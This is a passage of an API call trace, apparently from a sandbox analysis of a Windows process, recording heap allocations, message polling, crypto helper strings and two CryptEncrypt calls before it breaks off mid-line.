1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e98 [0268.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.647] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4dbb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4dc0) returned 1 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.648] CharLowerBuffW (in: lpsz="byte[19904]", cchLength=0xb | out: lpsz="byte[19904]") returned 0xb [0268.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.649] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51cd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.649] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24970*, pdwDataLen=0x8cef60*=0x4dbb, dwBufLen=0x4dc0 | out: pbData=0x2f24970*, pdwDataLen=0x8cef60*=0x4dc0) returned 1 [0268.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.651] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.651] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.651] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.651] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.652] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.652] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.652] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f29738 [0268.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f332c8 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29738 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f29738 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f332c8 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f332c8 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29738 | out: hHeap=0x970000) returned 1 [0268.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24970 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1fba8 | out: hHeap=0x970000) returned 1 [0268.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, 